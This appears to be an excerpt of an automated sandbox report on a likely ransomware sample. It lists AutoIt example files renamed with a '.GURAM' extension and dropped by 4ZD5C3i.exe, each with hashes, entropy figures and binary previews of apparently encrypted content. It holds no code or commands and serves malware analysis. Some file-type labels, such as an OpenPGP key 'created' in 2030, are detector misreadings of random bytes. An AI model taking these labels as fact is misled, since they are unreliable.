                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\WinList.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1049
                                                                                                                                                                                                                                                Entropy (8bit):7.777013367958103
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:wcBowjenRjN1XaYtH0QCgjmJrc0YXUZtwsT45RgvW:wcKjXXa0H0QCu4o0jZtw9eu
                                                                                                                                                                                                                                                MD5:FA214317698BB693E33C204C55FCD978
                                                                                                                                                                                                                                                SHA1:B3EB09BE225DBF0A3809BEFE94A53B61F12C8448
                                                                                                                                                                                                                                                SHA-256:C1C57AB99CE09BBFAED18074BB32B10CE4684E201AF066342692E2B346110A86
                                                                                                                                                                                                                                                SHA-512:2EE6CC083DED10827900F66871940B4BB5E1654F14691E80EA5CC9E157A21248900964E4DBAE049CC709785E35F0C9B1467C100DD9305057AAE9D184B1D063A9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:?...Z.<{r.A......B*......Rs[./...6^-.N.m..%..+.5.X7m.B....Ht.~..h.......6...1....7..0..L....R.0..94u.....E.$.p..+]..../... g%@...m.>.1.F.KYX.....T....m..Oq.Q....o...i-...$.. ....~P7.<.p0..C<..}8.....h..,..d..m....W<+K....."....-...d+.......c..n...2..C.|e..q..}.......x....G.g...@......o.T.|.;+J.....lq....+O..k.i.Iz..h.-..Ph........C.c;-..o.[f.,...rr.....w..a.s...}F.`.....yH.N)....L.@c...B.....%.C.........5.......\fh.S.ut3"?..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$...;...p...R...

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\WinList[2].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Public Key Version 3, Created Tue Nov 19 03:13:33 2030, Unknown Algorithm (0xf4)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):950
                                                                                                                                                                                                                                                Entropy (8bit):7.774421904504526
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:RK4BhW0+e1y8zw8kNxDKdRajmJrc0YXUZtwsTGsy:MqW12yYw8kTeg4o0jZtwnsy
                                                                                                                                                                                                                                                MD5:658408321602FDBC9E832C126D66B2C3
                                                                                                                                                                                                                                                SHA1:D93748BF6D0238934499E262C0F30432B31E5073
                                                                                                                                                                                                                                                SHA-256:B8E1FEC9F038429BB3CB48994067BE5F848025DC0F83A49F418E8711DF8E407D
                                                                                                                                                                                                                                                SHA-512:0A0879FCD011AC226A26CCA13848F0F4CB44E5B3E68055ACFA9C79E7400E0FE866FEC0BDA38CACCAEE0938DB3750006CC5B5CDB85F02F9E5B784432F71F72ED3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.B.4..r...h......j.......E.7[..7.^o...U...<.@...*#../.%..8$...Z..{*..ea...B)N O.oon..y..D.l..f..q,J<j#-.x\n..%f.....X,....Y.....#..L..)...Mn.phn..N3..r....`<.=-....{.....|..'.*j1.Uud.:[...k.p7W.8:....97Y)..u..@..Lx.....nl...R..H.vJ.;..)={dE./M..4j.(hI?.c.%.E%...C....S..M.h....~.b.s...]..q...i...HW<)'..z..g..T...9.$. ......k..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..<Y.Z;.......d.v..$..c........S.d..V...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\WinMenuSelectItem.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Public Key Version 5
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):735
                                                                                                                                                                                                                                                Entropy (8bit):7.714798286865618
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:t+qNHZQS3sjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZYb0ku:VNHWS3sjmJrc0YXUZtwsTEo
                                                                                                                                                                                                                                                MD5:CE9039790833BAD4BCB6817162E903BE
                                                                                                                                                                                                                                                SHA1:88EB72F7F0105359380AF6B96302AB7D98D95C5B
                                                                                                                                                                                                                                                SHA-256:50A300696948A559FD07FCE99D514019572FED349C901004907C0807D04D837E
                                                                                                                                                                                                                                                SHA-512:DC285E7CC41C0C45AB89B07D2F9B69FABFEB0E87E13FC823785C515E4222314AE91F14B83382265E347A3EB1139DE60BC6CDC9EC7893986166BB7335F9EE24BB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.,....<..-.seD.....).dQ.v.wy!...(r?.a..U6W.8..e../..........q[|..TZ:........IY..Q#..x)S.....F..n!<..}B..,c.U.H...-1..VbY...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$...Vno.^M..p_........tD..1._.PBw"8.....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\WinMinimizeAll.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):626
                                                                                                                                                                                                                                                Entropy (8bit):7.627683584739235
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:WmdjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZKInku:7jmJrc0YXUZtwsTdn
                                                                                                                                                                                                                                                MD5:0B7AA1FA4FC24556401A36AEF516671A
                                                                                                                                                                                                                                                SHA1:BD8F796B5A268C6C3696553BB2C4258738B39EB5
                                                                                                                                                                                                                                                SHA-256:426BA7D097240992A78AB32436A532760AE72F3AF7C2C08C31CABF34727C1B94
                                                                                                                                                                                                                                                SHA-512:3EFD2C98DAF18B8133EF7767801D60E19972956A5CBFC5F5CEAF54F123F9B16DFFB0542685CA32D189074431762E1A2E35B1799A3E89C5328B0497425B70E4B9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...F4X...4..#ZII.5.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.F.o.@[..b....X}Q........D.]..*Kj(.....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\WinMinimizeAllUndo.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):630
                                                                                                                                                                                                                                                Entropy (8bit):7.606202782480237
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1QGgjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZ790c1ku:12jmJrc0YXUZtwsTf95t
                                                                                                                                                                                                                                                MD5:06C59C3B637DD20C33EFC7C259ECEDDE
                                                                                                                                                                                                                                                SHA1:3345624047BC47621D0ED24F214834CF7CA6766A
                                                                                                                                                                                                                                                SHA-256:90164C592EC7C0C4F32DA9A3B4874D934032CEA84C2668D4D223DD74AE585931
                                                                                                                                                                                                                                                SHA-512:AD0D3829E85A8184F1F41F2E839EB4031D7C27C8B1C2F350A46C9586F07B36B9D681D1F6A93FC2C948D519B22A4E88BD2C65976AEC9EB9D34E6D01D2D25850BF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....e.JC.>D.O-..G.Z<x.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..F...ZXo6s=+.u.Y......2..\u...+#.......................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\WinMove.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1566
                                                                                                                                                                                                                                                Entropy (8bit):7.8641342493012365
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:8PVUxF0z3VD9iE13ly+uUXz74o0jZtww9k:8dUPaFDdtl/zAlew6
                                                                                                                                                                                                                                                MD5:F9792AD2E89306F037B737382654D3D1
                                                                                                                                                                                                                                                SHA1:62B6C8E3ACD073071A0F2B3464C6C5DE50A6C08C
                                                                                                                                                                                                                                                SHA-256:4CAE7CB19C33C156AC8C67286CE2B9E14A3D30EE6A0B97729B10B0204AAC69E6
                                                                                                                                                                                                                                                SHA-512:D588E0A443816211B55C679CC76C7AB83BCAB2B0A7FE03B89EA69B0D4D4E2D63EE7659BA6696E61CBFAABD6FA0D068A4FA265E5D4EB8A7549A37974B219FFC0B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...+5E.._4Cx\.....n.5{.....k.*.up../.$.`..Y....8..5...r X....K.&..<1u...".2.......]....<.....i....`q..6,..R......+..0..Q.....{.._u][.......@,T...>.O........&s....n..]z!<H..0...CF........%..E...~z....s...X.^.p..'Z..M..&.....E[...5B0&.1@....".\./`>PMk......L...#."..bF..$.z.~501I.{...{9....t.\8Ul...L5.t..^\..g.Hu0..p.K......D.....:.j....!.'R....y.V.....$.k.H..n...M.0F....!...0F.e<s....0.M....G`....|...k...b.q..7.&Wb.Dj.*..g.....#....YW...Gu......2m...v.3..^.4.g.....?..z9 .:...4....b...^..;..U.7.....jt.'+a..........f^U.r.....9.tb..3.'T...0.....,o=..t&...s.JG7Zj.....#.....j..f<...]../....aT_..S...3..7.H........EK..l..T..b....&....<7...v`..j.k...0.G5.w.............=u.hE...........Z.R....5di..#j......:....M-.dAe.F.P.Q...4^0.'.L./.;$.3.8......~..|..3I.I.G.....o.I..dk...e*^.T..+n............&)F..$..=1..............F..yx/.....}....p`...[.3.s...H..T....L@xn.r..q.[..j;..Tk...!.......ig.......^..7ShR@..M..a........>....=..=GsL.}<..\...{..g.v.Tq.cs..~..

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\WinSetOnTop.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1070
                                                                                                                                                                                                                                                Entropy (8bit):7.800156941101698
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:Lw9wfGg/CJRVRJGfSjjmJrc0YXUZtwsTVRlpey:LtT/C/VRIfSn4o0jZtw6Gy
                                                                                                                                                                                                                                                MD5:A3CAE2009444491CABB1F3BE03EC0BAC
                                                                                                                                                                                                                                                SHA1:4F416FDAD98AD6566FCA765FC0AE032221328725
                                                                                                                                                                                                                                                SHA-256:83F2B353FFA01C040EC4F6F60BF2CA2FCBC808DCF18E0EEAB82EA7555A3D85ED
                                                                                                                                                                                                                                                SHA-512:29A0B53BE3F3468198BCA4CF7DDB2C77CDAC71F451CEB168AFB32C69274039E2D40A2D036B67B95456F102A259CA9C6C11F04079455E5691BDF9A62394AA9D9C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.8....t.T.8._.{..[;.TgG....g....!.T.....<.oFw7[.W..~.O..?..y.C.|.Z..if.....=.y..?..=.K.C.....C.r.........U..;..>.h...;.$.6NV.d........A.....3.%..7...D...-.$..M..H.nO%...[.."...t..&......O.|.G..ive..()..7R<g.G. ...........]..k{...q.j..$.L(..V......a2...=......s\...SF.....0h.........[.;SY.u...v..4.......-bM.6.....K.."!d?....$..KBk........b>.&.1.ve.3....t......&?G.r.A.^.1..+..<.!.1T..i..n..I..C&..Q.O.W..\.p'...wKT..O...M..}.<.*$.:u..i..-...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\WinSetState.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Public Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1147
                                                                                                                                                                                                                                                Entropy (8bit):7.822858540246468
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:qoFT5j7R6b26EckHwQlitkgT7jmJrc0YXUZtwsTia:qoFFj7oEnii4/4o0jZtwXa
                                                                                                                                                                                                                                                MD5:6E876DDEE46821AC5D71F2E5E1369FDD
                                                                                                                                                                                                                                                SHA1:30F977E67A322A4F67E94594137638627745B24B
                                                                                                                                                                                                                                                SHA-256:DE06E8F9C5E2D61DC3D37F6F9B9D767759701A06A48A39ECBE7AAA3FDF52DEE4
                                                                                                                                                                                                                                                SHA-512:3A4BB683E55CC3C363C37F8095431E5DA983FEC9422F6FF79F39261B65D5F165C9D984A4F57775EA303DBAB710611B1EB1FBCD6621E80BC2D5BF60EA52E33534
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.(..'...n.E.../......2..I.y..g.. W..H..0.kF..........wK8.t....+4.G....P.{...1..2S. K'.I..G....V+..Q.iK..'B....7ad|J.|.........s'{~..Y......{.......9.......X...<.'...6.N.:.C..2.i{.}.....8.a....<.m..Nb.}kP?..:.8.b...G.Z3.7.....Ml31..c...&.9^=...-.W...e.`H5g9........>...~U.2.idgI..k}.....q......^J..'.z......u......2.Q.a.q......':^....Z.T#..>p..{.H.}..R...I.<qB.Y~m.6H'....t......;..I..O...kO...+..,..v....S...`.....A.#...?.[..*.\U...".....U...sG..B.[.(...=/X.c"^q.jN.m....#..bK.6...j=.......l.Z...R..&.L..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\WinSetTitle.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1107
                                                                                                                                                                                                                                                Entropy (8bit):7.8106297250796395
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:mH83MtpIGJlzuwQJxtjmJrc0YXUZtwsTc:+88tGGJlzuw2x14o0jZtwP
                                                                                                                                                                                                                                                MD5:A4A67CCEC1E0E93E46638E14C45C8D2E
                                                                                                                                                                                                                                                SHA1:345433938BD6C9A00DDED7C4E12EDCF926AF7AC3
                                                                                                                                                                                                                                                SHA-256:10426B609D6C66E55BEF1ED49CE3765DCF559B35CA9FA0C66AE3C86470A091DC
                                                                                                                                                                                                                                                SHA-512:4AFD0BA595BAA96363B93D39B4DA2C59A8F370EFB55E5F71647BA5707066FE41018BEA860051F80481C44320B7651BD989D6DDF60194EACD0E97C70F3FBAF89E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..V..4...y.ZD.s.../&...V.^]Av......6....W.3..:.SFh.9U....H.f.....)/..C.....K?.+N.,..b.hJQycN...$.....2F..qxe..=...j..H0....T....i.?Ar.........6d..Q....o6Z..RP.A.....dW...T.v...L..Q.`.*...)..$......YT..2.-7.).5..1..[.......s.~...3.m.9..1v/.4.gx.I....T.CYp@.i9I..........`C......I..4.\.....x]!.-e.;.+.....U:.uSm...V~..S...@M.c.q..W.S....a..Z.I..u..Gd...n..5.C..~.....\~..X..$n..wG.....U.D.Z....N.....v=.H.kYwB.0.gm\..z............q.Zo.5..t.A....k......~.!......?..L..!x@....C...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\WinSetTrans.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1048
                                                                                                                                                                                                                                                Entropy (8bit):7.781289831189132
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:wsfXdOI9k3k5T+fmPuNlWfkjmJrc0YXUZtwsTIAksC:RF9k05TCIuB4o0jZtwZAkn
                                                                                                                                                                                                                                                MD5:38FE17068682792E13A99EF4CE367903
                                                                                                                                                                                                                                                SHA1:54D9DCB9CB89C841243E752747494B887D90EAB1
                                                                                                                                                                                                                                                SHA-256:C266F0B497F1977D789372F90A59CC740279F29BEA38C9C7BCB158FE202AAA82
                                                                                                                                                                                                                                                SHA-512:ACD986E47AB52749C65041CB2B29F8254845303286CF224319A3AFD3CACC958239A71FAD29A485D7DF70A069275C86674705758A37FF4B12D58D7FA843F253B7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.U]..r...\.f!&.W......u.....{.V"L....h7.......Kq..,d'..*..Z.......X.S\....!.b.../...^T..J.~(....(V ..&.0........u....,....+.2"....Y.K.(:lK..*s.<..f.D6.N.o....1+N..s.......[....L..\.......S..\..].#..f^T.2..+E}...w.....`x.......&..N..F....AU~.....kh..O.v(..2.......4...1.S.m5.....K.p...l..:.T.42.PX.M/.....9...H#Mh4....v..Os...~3s.(.K$u.?..G8.p.*...k..w..8..(...;....k_...A.;...u....K.N[...5Yl]8w...(........Q...T..q.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.W@...2@JD.Y.5Dv.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\WinWait.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):953
                                                                                                                                                                                                                                                Entropy (8bit):7.767263035019047
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:qvE3uF69f4tfWl9wGO+S7vDXsnxO5rWKjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJ0:FMmFOb7rXjNWKjmJrc0YXUZtwsT6tp
                                                                                                                                                                                                                                                MD5:D46D6FEBDAA1ABA2C2E4268C90259421
                                                                                                                                                                                                                                                SHA1:19330EBEC544E1EC6FAA4F47BDB0215F6E56895D
                                                                                                                                                                                                                                                SHA-256:548C95EC29015BB588E9F0F51ED1BD56046E5982A42D91A185A5F28EA1D5A12F
                                                                                                                                                                                                                                                SHA-512:C84C08C0E1E045F0171F68DA26B049C1EC6F17626367C9D94ADC48981BB47B1D94CC45A61C990E0879917277C4A0766D3AAD31EB3C5565B4FC6BB77B3625892A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.."4\.n.F.?..C....#........&^c.d.b4..$.ik.F....0$;H....z.Y.K...t..2.=.=.7(....6M.(..[9}..'...y.Y.*.,DL$u.lp....?G=.....]g.$..P.8.*.e....i....?da...8).4E..e.n.....$..WL..1...+.LZ.......ju.....J...^.a..X...k.<.7..5..$...+.M.+..6......H..l .n.U..w..?.1..).1.H....F...Gd|t...F.....f.....0Bf.E......dNe.C.D...^.s.....Q....v...\^M.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$...V*..?.TtR....y...|]..:.Sc.h..v..].Y...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\WinWaitActive.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):959
                                                                                                                                                                                                                                                Entropy (8bit):7.749250855972071
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:MWY94gTFT8fLSeJQh79jmJrc0YXUZtwsT6Y:X88WeJ67F4o0jZtwO
                                                                                                                                                                                                                                                MD5:3907A5E7861845807C032DD1F54170C8
                                                                                                                                                                                                                                                SHA1:D1889247D022AD1918E8E9A0D24E571D858FA158
                                                                                                                                                                                                                                                SHA-256:3B692202253E43CF03C43FAA72F91858979C71352987834D834E621C3C611379
                                                                                                                                                                                                                                                SHA-512:1E2557BE5F3EDF8B7FFB95362CA4A9871EA7475E65718A5CF15F5A4ADD4EE89F2F9766899521792FA930239B41F7A7ADD3795CCBDF2D44278DD9237ADE11DEB0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
